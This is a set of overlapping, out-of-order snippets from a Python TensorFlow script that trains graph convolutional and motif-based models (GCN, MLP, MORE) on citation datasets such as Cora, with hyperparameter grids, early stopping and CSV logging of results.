"\"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() -",
"num_supports = 1 + FLAGS.max_degree model_func = GCN elif FLAGS.model == 'dense': support",
"embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch = False if use_batch: FLAGS.model",
"Function: Run training #-------------------------- import package --------------------------# from __future__ import division from __future__",
"temp2 = temp1 + [mo[j]] for k in range(0, 5): temp3 = temp2",
"{:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a') as f:",
"# 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number",
"train_acc, val_acc, Tacc = [], [], [] train_loss, val_loss, Tloss = [], [],",
"cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time = time.time() - train_starttime",
"in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in",
"MORE else: raise ValueError('Invalid argument for model: ' + str(FLAGS.model)) # Define placeholders",
"- t) test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc)",
"flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number",
"= 1 + FLAGS.max_degree model_func = GCN elif FLAGS.model == 'dense': support =",
"'gcn': support = [preprocess_adj(adj)] num_supports = 1 model_func = GCN elif FLAGS.model ==",
"'the dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number of property",
"i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f: for i in",
"y_train, y_val, y_test, train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) # Some preprocessing features",
"placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2])",
"'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial",
"_ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32,",
"= temp1 + [mo[j]] for k in range(0, 5): temp3 = temp2 +",
"model model = model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session sess = tf.Session() #",
"= preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support = [preprocess_adj(adj)] num_supports = 1 model_func",
"Train model train_starttime = time.time() train_time_list = [] stop_epoch = 0 for epoch",
"FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden",
"early stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden layer",
"} # Create model model = model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session sess",
"time.time() stop_epoch = epoch + 1 # Construct feed dictionary feed_dict = construct_feed_dict(features,",
"\"Hadamard\", 'the method of embedding combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" #",
"FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load data adj, features, y_train, y_val,",
"construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs =",
"flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden",
"use_batch: FLAGS.model = 'MotifGCN' lr = [0.01, 0.001, 0.0003, 0.003] le = [300,",
"FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] #",
"Validation cost, acc, duration = evaluate(features, support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc)",
"15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2]",
"layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of",
"str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f:",
"64, 128, 256, 512] mode_list = [] for i in range(0, 4): temp1",
"(1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding matrix.')",
"flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.')",
"512] mode_list = [] for i in range(0, 4): temp1 = [lr[i], le[i]]",
"1 model_func = GCN elif FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports",
"= MLP elif FLAGS.model == 'MORE': support = [preprocess_adj(adj)] # Not used num_supports",
"0 for epoch in range(FLAGS.epochs): t = time.time() stop_epoch = epoch + 1",
"'Number of units in hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.')",
"tf.placeholder(tf.int32) } # Create model model = model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session",
"= time.time() train_time_list = [] stop_epoch = 0 for epoch in range(FLAGS.epochs): t",
"\"Summation\", \"Connection\"] la = [32, 64, 128, 256, 512] mode_list = [] for",
"support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping and cost_val[-1]",
"\"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t) test_cost, test_acc, test_duration =",
"import * from Code_models import GCN, MLP, MORE #--------------------------- main process ---------------------------# #",
"= time.time() test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) print(\"Test",
"from __future__ import print_function import time import tensorflow as tf import winsound from",
"in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f: for i in train_acc:",
"in range(0, 3): temp2 = temp1 + [mo[j]] for k in range(0, 5):",
"MLP elif FLAGS.model == 'MORE': support = [preprocess_adj(adj)] # Not used num_supports =",
"raise ValueError('Invalid argument for model: ' + str(FLAGS.model)) # Define placeholders placeholders =",
"flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning",
"time.time() feed_dict_val = construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy],",
"= time.time() - train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing",
"y_test, test_mask, motiffeatures, placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration))",
"\"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time = time.time() -",
"Settings flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora',",
"format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\",",
"shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout':",
"Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the",
"train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc, duration = evaluate(features, support, y_val, val_mask, motiffeatures,",
"train_time_list = [] stop_epoch = 0 for epoch in range(FLAGS.epochs): t = time.time()",
"FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as",
"dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0.,",
"load_data(FLAGS.dataset) # Some preprocessing features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model ==",
"feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc, duration = evaluate(features, support, y_val, val_mask,",
"= sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc, duration =",
"# Set random seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags =",
"probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance",
"Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing test_starttime = time.time() test_cost, test_acc, test_duration =",
"= mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load",
"---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch = False if use_batch: FLAGS.model =",
"elif FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree",
"i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration = 500 # millisecond freq",
"print_function import time import tensorflow as tf import winsound from Code_utils import *",
"Finished!\") train_time = time.time() - train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):]",
"f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration = 500 #",
"winsound from Code_utils import * from Code_models import GCN, MLP, MORE #--------------------------- main",
"y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\", '%04d' %",
"flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif features')",
"val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\", '%04d' % (epoch",
"[] stop_epoch = 0 for epoch in range(FLAGS.epochs): t = time.time() stop_epoch =",
"seed = 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags = tf.app.flags FLAGS = flags.FLAGS",
"placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\")",
"from __future__ import division from __future__ import print_function import time import tensorflow as",
"FLAGS.model == 'dense': support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func",
"stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden layer 1.')",
"45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden =",
"= tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora', 'citeseer', 'pubmed'",
"val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration =",
"'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs to train.')",
"import package --------------------------# from __future__ import division from __future__ import print_function import time",
"500, 'Number of epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep",
"1000, 2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"] la = [32, 64, 128, 256,",
"model = model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session sess = tf.Session() # Define",
"support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func = MLP elif",
"loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping (# of epochs).')",
"'the hidden layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number",
"Initialize session sess = tf.Session() # Define model evaluation function def evaluate(features, support,",
"test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f: for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for",
"= [lr[i], le[i]] for j in range(0, 3): temp2 = temp1 + [mo[j]]",
"[] # Train model train_starttime = time.time() train_time_list = [] stop_epoch = 0",
"'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask':",
"__future__ import print_function import time import tensorflow as tf import winsound from Code_utils",
"val_loss, Tloss = [], [], [] # Train model train_starttime = time.time() train_time_list",
"embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16,",
"time.time() - test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout,",
"'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate',",
"[] train_loss, val_loss, Tloss = [], [], [] # Train model train_starttime =",
"'MotifGCN' lr = [0.01, 0.001, 0.0003, 0.003] le = [300, 500, 1000, 2000]",
"= [300, 500, 1000, 2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"] la = [32,",
"mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load data adj, features, y_train,",
"[] train_acc, val_acc, Tacc = [], [], [] train_loss, val_loss, Tloss = [],",
"= flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model",
"f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f: for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\")",
"motiffeatures = load_data(FLAGS.dataset) # Some preprocessing features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if",
"test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden),",
"as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list),",
"motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256],",
"lr = [0.01, 0.001, 0.0003, 0.003] le = [300, 500, 1000, 2000] mo",
"mode_list.append(temp3) mode = mode_list[59] # 0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0]",
"'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2],",
"Tloss.append(test_cost) if epoch > FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization",
"- train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing test_starttime =",
"\"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime # Save",
"= sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() - t_test) # Init variables",
"in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration = 500 # millisecond freq =",
"\"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t) test_cost, test_acc, test_duration = evaluate(features,",
"f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i))",
"# Define placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features':",
"epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum",
"temp3 = temp2 + [la[k]] mode_list.append(temp3) mode = mode_list[59] # 0-14, 15-29, 30-44,",
"support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree model_func = GCN elif",
"set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc)))",
"Define model evaluation function def evaluate(features, support, labels, mask, motiffeatures, placeholders): t_test =",
"f: for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\")",
"data adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) #",
"tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) }",
"duration = evaluate(features, support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print",
"'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001,",
"[256], 'the hidden layer number of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer",
"= GCN elif FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1",
"f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f:",
"3): temp2 = temp1 + [mo[j]] for k in range(0, 5): temp3 =",
"tf.Session() # Define model evaluation function def evaluate(features, support, labels, mask, motiffeatures, placeholders):",
"flags.DEFINE_integer('epochs', 500, 'Number of epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 -",
"+ [la[k]] mode_list.append(temp3) mode = mode_list[59] # 0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate",
"flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\"",
"combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch = False if",
"[mo[j]] for k in range(0, 5): temp3 = temp2 + [la[k]] mode_list.append(temp3) mode",
"motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() - t_test)",
"model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() - t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val",
"main process ---------------------------# # Set random seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed) #",
"1 + FLAGS.max_degree model_func = GCN elif FLAGS.model == 'dense': support = [preprocess_adj(adj)]",
"'Weight for L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping",
"train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs = sess.run([model.opt_op, model.loss, model.accuracy],",
"labels, mask, motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time()",
"package --------------------------# from __future__ import division from __future__ import print_function import time import",
"[], [] # Train model train_starttime = time.time() train_time_list = [] stop_epoch =",
"rate (1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding",
"Sound duration = 500 # millisecond freq = 600 # Hz winsound.Beep(freq, duration)",
"sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() - t_test) # Init variables sess.run(tf.global_variables_initializer())",
"FLAGS.property_embedding_hidden = [mode[3]] # Load data adj, features, y_train, y_val, y_test, train_mask, val_mask,",
"results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time",
"epoch in range(FLAGS.epochs): t = time.time() stop_epoch = epoch + 1 # Construct",
"as tf import winsound from Code_utils import * from Code_models import GCN, MLP,",
"= False if use_batch: FLAGS.model = 'MotifGCN' lr = [0.01, 0.001, 0.0003, 0.003]",
"# Some preprocessing features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model == 'gcn':",
"= mode_list[59] # 0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs =",
"y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping and cost_val[-1] >",
"train_starttime = time.time() train_time_list = [] stop_epoch = 0 for epoch in range(FLAGS.epochs):",
"123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora',",
"placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc",
"= evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\",",
"acc = {:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a')",
"train_time = time.time() - train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):] #",
"for k in range(0, 5): temp3 = temp2 + [la[k]] mode_list.append(temp3) mode =",
"- t)) train_time_list.append(time.time() - t) test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask,",
"elif FLAGS.model == 'MORE': support = [preprocess_adj(adj)] # Not used num_supports = 1",
"train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f: for i in train_loss: f.write(\"{:.6f},\".format(i))",
"> FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time =",
"i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i",
"np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f: for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\")",
"= 0 for epoch in range(FLAGS.epochs): t = time.time() stop_epoch = epoch +",
"MLP, MORE #--------------------------- main process ---------------------------# # Set random seed seed = 123",
"# Author: <NAME> # Data: 2020-01-10 # Function: Run training #-------------------------- import package",
"# embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch = False if use_batch:",
"# Not used num_supports = 1 model_func = MORE else: raise ValueError('Invalid argument",
"f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration = 500 # millisecond freq = 600 #",
"\"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time =",
"(# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden layer 1.') flags.DEFINE_integer('max_degree',",
"'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree model_func = GCN",
"+ [mo[j]] for k in range(0, 5): temp3 = temp2 + [la[k]] mode_list.append(temp3)",
"'Model string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs',",
"[] for i in range(0, 4): temp1 = [lr[i], le[i]] for j in",
"of embedding combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch =",
"= 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset',",
"5): temp3 = temp2 + [la[k]] mode_list.append(temp3) mode = mode_list[59] # 0-14, 15-29,",
"[preprocess_adj(adj)] # Not used num_supports = 1 model_func = MORE else: raise ValueError('Invalid",
"flags.DEFINE_list('integration_hidden', [], 'the hidden layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of",
"acc, duration = evaluate(features, support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) #",
"= Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing test_starttime = time.time() test_cost, test_acc, test_duration",
"20):] # Testing test_starttime = time.time() test_cost, test_acc, test_duration = evaluate(features, support, y_test,",
"0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method =",
"FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load data adj,",
"= construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return",
"le[i]] for j in range(0, 3): temp2 = temp1 + [mo[j]] for k",
"hidden layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number of",
"mask, motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() -",
"epoch + 1 # Construct feed dictionary feed_dict = construct_feed_dict(features, support, y_train, train_mask,",
"support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\", '%04d'",
"# Train model train_starttime = time.time() train_time_list = [] stop_epoch = 0 for",
"= [mode[3]] # Load data adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask,",
"128, 256, 512] mode_list = [] for i in range(0, 4): temp1 =",
"'MORE', 'Model string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.')",
"if epoch > FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\")",
"def evaluate(features, support, labels, mask, motiffeatures, placeholders): t_test = time.time() feed_dict_val = construct_feed_dict(features,",
